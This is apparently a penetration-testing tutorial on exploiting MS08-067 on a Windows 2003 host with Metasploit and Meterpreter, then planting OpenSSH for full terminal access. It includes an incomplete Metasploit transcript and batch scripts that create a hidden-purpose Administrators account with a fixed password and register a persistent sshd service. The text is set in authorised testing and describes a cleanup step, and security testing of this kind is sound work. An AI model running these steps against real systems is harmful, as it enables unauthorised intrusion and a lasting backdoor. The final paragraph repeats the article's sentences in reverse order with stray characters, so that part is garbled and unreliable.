During a network penetration test, Windows command shell access is often obtained through some sort of exploit. If, for example, Metasploit is being used, command shell access can be delivered as the payload of a buffer overflow exploit. If Meterpreter is being used instead, command shell access can be had by executing CMD.EXE and interacting with it directly, or by having NETCAT shovel a command shell back to the penetration tester.

The challenge is that command shell access is not equivalent to full terminal access. The command shell may produce strange output due to control characters, and some commands may not function normally if they depend on the use of control sequences. If NETCAT is being used to shovel a shell, entering CTRL-C to terminate a command can end up terminating your shell!

If a penetration tester is permitted to modify the target server, then a more consistent, fully functional terminal-level access will greatly help during the testing process. A number of choices exist, including activating the telnet service, activating Microsoft Terminal Services (Remote Desktop Protocol), installing VNC, or installing OpenSSH for Windows. VNC is a convenient choice as it provides an easy command line installation with files residing in a single directory and only a limited number of registry entries; however, it offers no encryption. The telnet service offers no encryption either.

OpenSSH for Windows is a minimized Cygwin environment that has been customized to support only SSH. It supports SSH command line terminal access and secure copy / secure file transfer. Because the setup process in the OpenSSH package uses a GUI, you have to perform some steps to prepare your own command-line-only installation.

Preparing for a custom command line OpenSSH installation in your lab

The basic steps to prepare a command line OpenSSH installation for Windows are as follows:

1. Download the setupssh.exe installation package from the OpenSSH for Windows project.
2. Run the GUI installer package on your Windows lab/test machine.
3. I suggest accepting the default program location of C:\Program Files\OpenSSH.
4. Get a full copy of all of the files under the directory C:\Program Files\OpenSSH onto a USB flash drive or other favorite media. Copy recursively with XCOPY and make sure you fully retain the directory structure.
5. Export the following registry keys using the REG EXPORT command as follows:
   REG EXPORT "HKLM\SOFTWARE\Cygnus Solutions" 1.REG
   REG EXPORT "HKLM\SYSTEM\CurrentControlSet\Services\OpenSSHd" 2.REG
   REG EXPORT "HKLM\SYSTEM\ControlSet001\Services\OpenSSHd" 3.REG
   (CurrentControlSet is an alias for whichever ControlSetNNN the machine booted from. On a target that booted from a different control set, the ControlSet001 copy lands in an unused set and the CurrentControlSet copy is the one that matters.)
6. Concatenate all of these registry files together into one file. Save this OPENSSH.REG file into your local copy of the OpenSSH directory structure.

Performing an installation via command shell

Now that you have all of this data saved on your USB thumb drive, let's assume that our penetration testing machine is a CentOS Linux system with IP address 192.168.1.37, and that our target is a Windows 2003 SP0 machine with IP address 192.168.1.40. Our penetration testing Linux machine has our OpenSSH package files mounted under /mnt/PenTestTools/win32/OpenSSH. Our target happens to have the MS08-067 Server Service RPC vulnerability. Below is an example of how we exploit this vulnerability using Metasploit with the Meterpreter payload, upload our OpenSSH server files, add a new username, perform some minimal configuration and start the OpenSSH service.

Exploiting the target

   framework-3.2]# nc -v 192.168.1.40 445
   Connection to 192.168.1.40 445 port
   framework-3.2]#
   Searching loaded modules for pattern 'ms08_067'...
   windows/smb/ms08_067_netapi   Microsoft Server Service Relative Path Stack Corruption
   msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
   msf exploit(ms08_067_netapi) > set TARGET 5
   msf exploit(ms08_067_netapi) > show options
   Transmitting intermediate stager for over-sized stage...(191 bytes)
   meterpreter > lcd /mnt/PenTestTools/win32/OpenSSH
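Steps 4 through 6 of the lab preparation, collected into one cmd.exe batch file. This is an added example written for this article, not a script from the original text or from the OpenSSH for Windows package. The destination drive letter E: and the temporary file names under %TEMP% are assumptions. The one thing the article's "concatenate" step glosses over is that REG EXPORT writes UTF-16LE files, each with its own "Windows Registry Editor Version 5.00" header; the script handles that instead of doing a raw byte concatenation.

```batch
@echo off
rem prep-openssh.cmd -- run on the lab machine after the GUI installer has completed.
rem Added example for this article; E: and the %TEMP% file names are assumptions.
setlocal
set "SRC=C:\Program Files\OpenSSH"
set "DST=E:\OpenSSH"

rem Step 4: copy the whole tree. /E keeps empty directories, /H hidden and system files,
rem /K file attributes, /I treats the destination as a directory, /Y suppresses prompts.
xcopy "%SRC%" "%DST%" /E /I /H /K /Y || goto :fail

rem Step 5: export the three keys. REG EXPORT on XP/2003 prompts before overwriting,
rem so remove stale exports first. Each file is UTF-16LE with its own header line.
del /q "%TEMP%\1.reg" "%TEMP%\2.reg" "%TEMP%\3.reg" 2>nul
reg export "HKLM\SOFTWARE\Cygnus Solutions"                  "%TEMP%\1.reg" || goto :fail
reg export "HKLM\SYSTEM\CurrentControlSet\Services\OpenSSHd" "%TEMP%\2.reg" || goto :fail
reg export "HKLM\SYSTEM\ControlSet001\Services\OpenSSHd"     "%TEMP%\3.reg" || goto :fail

rem Step 6: merge into one file. A binary concatenation (copy /b) would leave a
rem byte-order mark and a second header in the middle of the file. TYPE converts
rem UTF-16 text to the console code page when its output is redirected, so the first
rem file is written whole and the others are appended with their header line skipped
rem (FOR /F drops blank lines by itself). Values in these keys are plain ASCII, so the
rem conversion loses nothing.
type "%TEMP%\1.reg" > "%DST%\OPENSSH.REG"
for %%N in (2 3) do (
    for /f "usebackq skip=1 delims=" %%L in (`type "%TEMP%\%%N.reg"`) do >> "%DST%\OPENSSH.REG" echo(%%L
)
del /q "%TEMP%\1.reg" "%TEMP%\2.reg" "%TEMP%\3.reg"

rem Sanity check: exactly one header, and all three key paths present.
find /c "Windows Registry Editor" "%DST%\OPENSSH.REG"
find /i "[HKEY_LOCAL_MACHINE" "%DST%\OPENSSH.REG"
goto :eof

:fail
echo Preparation failed with errorlevel %errorlevel%. 1>&2
exit /b 1
```

Run it from an elevated cmd.exe on the lab machine with the USB drive mounted as E:. The resulting OPENSSH.REG sits next to the bin\ and etc\ directories so that a single recursive upload carries everything the target-side import needs.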
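The target-side half of the procedure ("upload our OpenSSH server files, add a new username, perform some minimal configuration and start the OpenSSH service") as one cmd.exe batch file, written as an added example for this article; it is not the transcript from the original text. It assumes the OpenSSH tree from the USB drive, including OPENSSH.REG, has already been uploaded to C:\Program Files\OpenSSH (for instance with Meterpreter's recursive upload after the lcd shown above) and that the script is run from a cmd.exe obtained through the Meterpreter session. The account name and password, the mkpasswd/mkgroup step, and the cygrunsrv fallback are assumptions about how the Cygwin-based package is configured, not steps the article shows.

```batch
@echo off
rem install-sshd.cmd -- run on the target from the cmd.exe obtained through Meterpreter,
rem after the OpenSSH tree (including OPENSSH.REG) has been uploaded to %SSHHOME%.
rem Added example for this article. Account name, password, and the mkpasswd/cygrunsrv
rem steps are assumptions, not steps shown in the original transcript.
setlocal
set "SSHHOME=C:\Program Files\OpenSSH"
set "U=pentest"
set "P=Chang3Me-Now!"

if /i "%~1"=="cleanup" goto :cleanup

rem 1. Recreate the Cygwin mount points and the OpenSSHd service key exported in the lab.
reg import "%SSHHOME%\OPENSSH.REG" || goto :fail

rem 2. Add the test account. The password must satisfy the target's password policy,
rem    and it is visible in the process list while net.exe runs.
net user %U% %P% /add /comment:"pentest access - remove after engagement" || goto :fail
net localgroup Administrators %U% /add || goto :fail

rem 3. Minimal configuration: Cygwin sshd resolves logins through etc\passwd and
rem    etc\group, so the new account has to be appended to both.
"%SSHHOME%\bin\mkgroup.exe"  -l        >> "%SSHHOME%\etc\group"  || goto :fail
"%SSHHOME%\bin\mkpasswd.exe" -l -u %U% >> "%SSHHOME%\etc\passwd" || goto :fail

rem 4. Start the service. The Service Control Manager builds its list of services at
rem    boot, so a key that was only imported into the registry may not be visible yet;
rem    in that case register the service the way the GUI installer does, via cygrunsrv.
net start OpenSSHd
if errorlevel 1 (
    "%SSHHOME%\bin\cygrunsrv.exe" -I OpenSSHd -p /usr/sbin/sshd -a -D || goto :fail
    net start OpenSSHd || goto :fail
)

rem 5. Confirm sshd is listening before leaving the Meterpreter session.
netstat -an | find ":22 " | find "LISTENING" || goto :fail
echo OpenSSHd is running; connect with: ssh %U%@%COMPUTERNAME%
goto :eof

:cleanup
rem Undo everything at the end of the engagement: stop and unregister the service,
rem remove the account, the registry keys and the files.
net stop OpenSSHd
"%SSHHOME%\bin\cygrunsrv.exe" -R OpenSSHd
net user %U% /delete
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\OpenSSHd" /f
reg delete "HKLM\SOFTWARE\Cygnus Solutions" /f
rmdir /s /q "%SSHHOME%"
goto :eof

:fail
echo Installation step failed with errorlevel %errorlevel%. 1>&2
exit /b 1
```

Run it once with no arguments to install, and as `install-sshd.cmd cleanup` when the test is over. Since the script adds an administrator account and a listening service to a client's host, record both in the engagement notes so the cleanup step is not forgotten, and prefer a password that is generated per engagement rather than the placeholder above.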
Download the setupssh.exe installation package from Ģ. The basic steps to prepare a command line OpenSSH installation for Windows are as follows:ġ. Preparing for a custom command line OpenSSH Installation in your lab Because the setup process in the OpenSSH packages uses the GUI, you have to perform some steps to customize your own command line only installation. It supports SSH command line terminal access, and secure copy / secure file transfer. OpenSSH for windows ( ) is a minimized Cygwin ( ) environment that has been customized to support only SSH. The telnet service offers no encryption either. VNC is a great choice as it provides an easy command line installation with files residing in a single directory, and only a limited number of registry entries, however it offers no encryption. A number of choices exist including activating the telnet service, activating Microsoft terminal services (remote desktop protocol), installing VNC (or installing OpenSSH for Windows. If a penetration tester is permitted to modify the target server, then a more consistent, fully functional terminal level access will greatly help during the testing process. If using NETCAT to shovel a shell, entering CTRL-C to terminate some command can end up terminating your shell! Some commands may not function normally if they depend on the use of control sequences. The command shell may produce strange output due to control characters. The challenge is that command shell access is not equivalent to full terminal access. Or if perhaps the Meterpreter is being used, command shell access can be had by executing a CMD.EXE and interacting directly with it, or perhaps by having NETCAT shovel a command shell back to the penetration tester. If, for example, Metasploit is being used, command shell access can be delivered as the payload of a buffer overflow exploit. During a network penetration test, Windows command shell access is often obtained through some sort of exploit.